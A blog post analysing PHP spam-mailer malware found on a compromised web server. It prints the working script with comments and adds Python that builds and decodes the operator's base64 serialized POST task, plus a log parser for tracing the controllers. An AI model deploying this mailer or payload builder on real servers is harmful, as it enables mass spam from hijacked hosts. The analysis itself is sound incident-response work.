PHP malicious code analysis no. 1

I found this piece of PHP malware on a compromised web server that I recently started administering. Its name was a random character string, e.g. acbjxuu.php. There were about 20 more scripts of this kind. It's a rather simple script for spamming purposes. To help you understand it, I've written what it does in comments between the code lines.

<?php
// the script only does anything when the operator POSTs a variable named task; a plain GET returns an empty page
if (isset($_POST['task'])) {
	// make sure all PHP errors are displayed, so the operator sees why a run failed
	ini_set('display_errors', TRUE);
	// raise the PHP memory limit to 512M so a large task list can be unserialized
	ini_set('memory_limit', '512M');
	// disable the PHP execution time limit so a long mailing run is not cut off
	set_time_limit(0);	// this call was missing from the listing as found; reconstructed from the comment above
	// get a serialized array from the POST variable named task (base64 on top, so it survives form encoding)
	// example array structure: array(array('to'=>'', 'msg'=>'message content', 'subj'=>'Message subject ex. cheap cialis :)'));
	$x = unserialize(base64_decode($_POST['task']));
	// if the task variable was not a valid serialized value, just die silently...
	if ($x == false) { exit(); }
	// base64-encoded URL of this very script; it is substituted into each message wherever [send_from_url] appears,
	// presumably so the spammer's links can tell which compromised host sent a given mail
	$send_from = base64_encode('http://'.$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']);
	// now send half a million viagra & cialis related mails...
	foreach ($x as $arr) {
		// print each recipient, so the operator sees progress in the HTTP response
		echo $arr['to']."\r\n";
		$arr['msg'] = str_replace('[send_from_url]', $send_from, $arr['msg']);
		// HTML mail, declared as windows-1251 (the Cyrillic code page)
		mail($arr['to'], $arr['subj'], $arr['msg'], "MIME-Version: 1.0\r\nContent-type: text/html; charset=windows-1251\r\n");
	}
	exit('SEND OK');
}
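To see exactly what the operator has to send to this script, and to decode a captured POST body back into the list of mail jobs, here is an added example in Python (not part of the original post and not the malware author's code). It implements just enough of PHP's serialize()/unserialize() format for the array-of-arrays structure the script expects, wraps it in base64 the way the `task` variable requires, and performs the same [send_from_url] substitution. The host name example.org, the path /acbjxuu.php, the shop.example link and the two mail jobs are constructed sample data, not a real capture.

```python
import base64

# Minimal PHP serialize()/unserialize() covering the types this spam script needs
# (arrays, strings, ints, bools, null). String lengths are byte counts, as in PHP.

def php_serialize(v) -> str:
    if isinstance(v, bool):                      # bool before int: True is an int in Python
        return f"b:{int(v)};"
    if isinstance(v, int):
        return f"i:{v};"
    if v is None:
        return "N;"
    if isinstance(v, str):
        return f's:{len(v.encode("utf-8"))}:"{v}";'
    if isinstance(v, (list, tuple)):
        v = dict(enumerate(v))                   # a PHP list is an array with keys 0..n-1
    if isinstance(v, dict):
        body = "".join(php_serialize(k) + php_serialize(x) for k, x in v.items())
        return f"a:{len(v)}:{{{body}}}"
    raise TypeError(f"cannot serialize {type(v).__name__}")

def php_unserialize(data: bytes):
    value, pos = _parse(data, 0)
    if pos != len(data):
        raise ValueError("trailing bytes after serialized value")
    return value

def _parse(d: bytes, i: int):
    t = d[i:i + 1]
    if t == b"N":                                # N;
        return None, i + 2
    if t in (b"i", b"b", b"d"):                  # i:123;  b:1;  d:1.5;
        end = d.index(b";", i)
        num = d[i + 2:end]
        if t == b"i":
            return int(num), end + 1
        if t == b"b":
            return num == b"1", end + 1
        return float(num), end + 1
    if t == b"s":                                # s:len:"bytes";
        colon = d.index(b":", i + 2)
        n = int(d[i + 2:colon])
        start = colon + 2
        if d[start + n:start + n + 2] != b'";':
            raise ValueError(f"bad string at offset {i}")
        return d[start:start + n].decode("utf-8", "replace"), start + n + 2
    if t == b"a":                                # a:count:{key;value;...}
        colon = d.index(b":", i + 2)
        n = int(d[i + 2:colon])
        i = colon + 2
        out = {}
        for _ in range(n):                       # PHP arrays keep insertion order, so do dicts
            k, i = _parse(d, i)
            v, i = _parse(d, i)
            out[k] = v
        if d[i:i + 1] != b"}":
            raise ValueError(f"unterminated array at offset {i}")
        return out, i + 1
    raise ValueError(f"unsupported type {t!r} at offset {i}")

def build_task(tasks: list) -> str:
    """What the spammer's controller has to POST as `task`."""
    return base64.b64encode(php_serialize(tasks).encode("utf-8")).decode("ascii")

def decode_task(b64: str) -> list:
    """Inverse: turn a captured `task` body back into the list of mail jobs, in foreach order."""
    arr = php_unserialize(base64.b64decode(b64, validate=True))
    if not isinstance(arr, dict):
        raise ValueError("task is not an array")
    return list(arr.values())

def is_valid_task(b64: str) -> bool:
    """Mirrors the script's `if ($x == false) exit();` check: garbage is rejected silently."""
    try:
        decode_task(b64)
        return True
    except ValueError:                           # binascii.Error is a ValueError subclass
        return False

def send_from_marker(host: str, uri: str) -> str:
    """The $send_from value: base64 of the sending script's own URL."""
    return base64.b64encode(f"http://{host}{uri}".encode()).decode("ascii")

def render_message(msg: str, host: str, uri: str) -> str:
    """Same str_replace() the script performs before calling mail()."""
    return msg.replace("[send_from_url]", send_from_marker(host, uri))

SAMPLE_TASKS = [  # constructed sample, not a real capture
    {"to": "victim@example.com", "subj": "cheap cialis :)",
     "msg": '<a href="http://shop.example/?ref=[send_from_url]">buy now</a>'},
    {"to": "other@example.net", "subj": "cheap viagra", "msg": "<p>hello</p>"},
]

if __name__ == "__main__":
    payload = build_task(SAMPLE_TASKS)
    print("POST body the operator sends:  task=" + payload)
    for job in decode_task(payload):
        print(job["to"], "<-", render_message(job["msg"], "example.org", "/acbjxuu.php"))
```

Note that the recipient list and message text travel only in the POST body, which a normal access log does not record; to recover who was being spammed you need a request-body capture (a mod_security audit log, a packet capture, or a copy of the controller's traffic), while the access log still gives you the operator's IP addresses and the timing of each run.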

I'll look in the logs for IP addresses that tried to reach these scripts. Maybe I'll find something interesting. Wish me luck, and monitor your web server's contents!
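For the log search described above, here is an added example (not part of the original post) that pulls the relevant hits out of an Apache combined-format access log. It groups requests by client IP, separating POSTs (actual mailing runs) from GETs (the script returns nothing without a task, so those are at most probes), and flags POST responses of exactly 7 bytes, which is what the script returns when the task list is empty and only "SEND OK" is echoed. The dropper names, the random-name heuristic and the five log lines are constructed assumptions for the demonstration; the real list of filenames comes from the cleanup.

```python
import re
from collections import defaultdict

# Apache combined log: %h %l %u %t "%r" %>s %b "%{Referer}i" "%{User-agent}i"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)(?: [^"]*)?" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
)

# assumption: the names found during the cleanup; extend with the other ~20 files
KNOWN_DROPPERS = {"/acbjxuu.php", "/qwkzpld.php"}
# assumption: a heuristic for names of the same shape (a few lowercase letters in the webroot)
RANDOM_NAME_RE = re.compile(r"^/[a-z]{6,10}\.php$")
LEGIT_FILES = {"/index.php"}            # real application entry points to exclude

SEND_OK_LEN = len("SEND OK")            # response size of a run with zero recipients


def is_suspect_path(path: str) -> bool:
    path = path.split("?", 1)[0]
    if path in KNOWN_DROPPERS:
        return True
    return bool(RANDOM_NAME_RE.match(path)) and path not in LEGIT_FILES


def analyse(lines) -> dict:
    """Return {ip: {"post": n, "get": n, "empty_task": n, "paths": set()}} for suspect hits."""
    hits = defaultdict(lambda: {"post": 0, "get": 0, "empty_task": 0, "paths": set()})
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue                     # not a combined-format line, skip it
        path = m["path"].split("?", 1)[0]
        if not is_suspect_path(path):
            continue
        rec = hits[m["ip"]]
        rec["paths"].add(path)
        if m["method"] == "POST":
            rec["post"] += 1
            if m["size"] == str(SEND_OK_LEN):
                rec["empty_task"] += 1   # only "SEND OK" came back: empty task list
        else:
            rec["get"] += 1
    return dict(hits)


SAMPLE_LOG = """\
203.0.113.7 - - [12/Mar/2012:03:14:01 +0100] "POST /acbjxuu.php HTTP/1.1" 200 7 "-" "Mozilla/4.0 (compatible; MSIE 6.0)"
203.0.113.7 - - [12/Mar/2012:03:14:05 +0100] "POST /acbjxuu.php HTTP/1.1" 200 211 "-" "Mozilla/4.0 (compatible; MSIE 6.0)"
198.51.100.23 - - [12/Mar/2012:03:20:44 +0100] "POST /qwkzpld.php HTTP/1.1" 200 133 "-" "-"
192.0.2.10 - - [12/Mar/2012:03:21:00 +0100] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.0.2.10 - - [12/Mar/2012:03:21:02 +0100] "GET /acbjxuu.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
"""  # constructed sample lines, not real traffic

if __name__ == "__main__":
    for ip, rec in sorted(analyse(SAMPLE_LOG.splitlines()).items(), key=lambda kv: -kv[1]["post"]):
        print(f"{ip:15} POST={rec['post']} GET={rec['get']} empty_task={rec['empty_task']} "
              f"paths={sorted(rec['paths'])}")
```

Run it against the real log with `analyse(open('/var/log/apache2/access.log').readlines())`; IPs with many POSTs and large response sizes are the controller, while an address with a single GET and a 0-byte response is more likely a scanner or a curious visitor than the spammer.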

Published by

Konrad Fedorczyk

I'm interested in programming and gamedev. I especially love HTML5 and everything connected to web technologies.
